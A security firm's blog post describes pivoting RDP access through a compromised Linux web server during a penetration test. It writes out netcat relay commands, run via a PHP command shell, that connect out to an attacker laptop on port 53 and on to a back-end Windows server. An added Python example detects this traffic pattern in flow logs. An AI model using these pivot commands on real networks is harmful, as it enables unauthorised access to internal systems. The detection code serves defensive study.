A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end, so we needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunately the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 and, when a connection arrives, hands it to another netcat instance that listens locally on RDP port 3389 (note that in most netcat builds -e takes a bare program name, so where the chained command is rejected use the build's shell-command option, -c in netcat-traditional, with the inner command quoted):

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command (in netcat -p sets the local source port, so the destination ports are given as positional arguments, not with -p):

nc hacker-laptop 53 -e nc windows-server 3389

This caused the WWW server to create an outbound connection to our laptop, which in turn started another listener locally on TCP 3389.

It also created a connection between the WWW server and the Windows server.

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!
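From the defender's side, the relay above leaves a distinctive pair of flows: a web server opening an outbound TCP/53 session that behaves nothing like DNS (long-lived, megabytes of data), followed shortly by the same host connecting to an internal RDP port. The following is an added example, not part of the original post, that flags that pairing in constructed flow records; the hosts, addresses and thresholds are assumptions.

```python
"""Flag the TCP/53 egress + internal RDP pairing in (constructed) flow logs."""
import csv
from io import StringIO

# Hosts that should only ever serve HTTP(S); hypothetical addresses.
WEB_SERVERS = {"10.0.1.20"}
INTERNAL_NET = "10.0."          # prefix marking 'internal' destinations
DNS_MAX_SECONDS = 5             # real DNS-over-TCP exchanges are brief
DNS_MAX_BYTES = 4096            # ...and small

# Constructed sample records: the web server makes a normal UDP DNS query,
# then a long fat TCP/53 session, then an internal RDP connection.
FLOWS = """ts,src,dst,proto,dport,duration_s,bytes
100,10.0.1.20,8.8.8.8,udp,53,0,190
110,10.0.1.20,203.0.113.7,tcp,53,1850,9400210
115,10.0.1.20,10.0.2.15,tcp,3389,1840,9380000
120,10.0.1.20,10.0.2.16,tcp,443,2,3100
130,10.0.3.5,10.0.2.15,tcp,3389,600,2000000
"""

def parse_flows(text):
    rows = []
    for r in csv.DictReader(StringIO(text)):
        for k in ("ts", "dport", "duration_s", "bytes"):
            r[k] = int(r[k])
        rows.append(r)
    return rows

def suspicious_dns(flow):
    """TCP/53 from a web server that is too long or too fat to be DNS."""
    return (flow["src"] in WEB_SERVERS and flow["proto"] == "tcp"
            and flow["dport"] == 53
            and (flow["duration_s"] > DNS_MAX_SECONDS
                 or flow["bytes"] > DNS_MAX_BYTES))

def find_pivots(flows, window_s=60):
    """Pair each suspicious TCP/53 egress with an internal RDP connection
    from the same host shortly afterwards: that pairing is the relay."""
    alerts = []
    for out in filter(suspicious_dns, flows):
        alerts.append(("tcp53-egress", out["src"], out["dst"]))
        for inner in flows:
            if (inner["src"] == out["src"] and inner["dport"] == 3389
                    and inner["dst"].startswith(INTERNAL_NET)
                    and 0 <= inner["ts"] - out["ts"] <= window_s):
                alerts.append(("rdp-relay", out["src"], inner["dst"]))
    return alerts

if __name__ == "__main__":
    for alert in find_pivots(parse_flows(FLOWS)):
        print(alert)
```

The UDP query and the short HTTPS flow are left alone; only the long TCP/53 session and the RDP connection that follows it from the same host are reported.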

Again, proof that netcat rocks!
